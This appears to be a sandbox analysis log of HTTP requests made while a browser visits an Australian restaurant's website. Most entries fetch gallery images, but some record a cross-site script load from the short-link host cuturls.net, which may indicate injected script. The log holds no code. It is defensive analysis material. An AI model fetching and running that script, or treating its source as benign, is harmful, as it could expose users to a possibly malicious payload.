Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-9.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-8.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_new2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_new1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-7.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-8.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-10.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_new3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-11.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_new1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-7.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_new3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-10.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-8.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-11.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/galleryAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-m-2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallary-6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/gallery/gallery_N4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aboutUs HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_aboutUs_image.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/aboutUsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_aboutUs_image.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
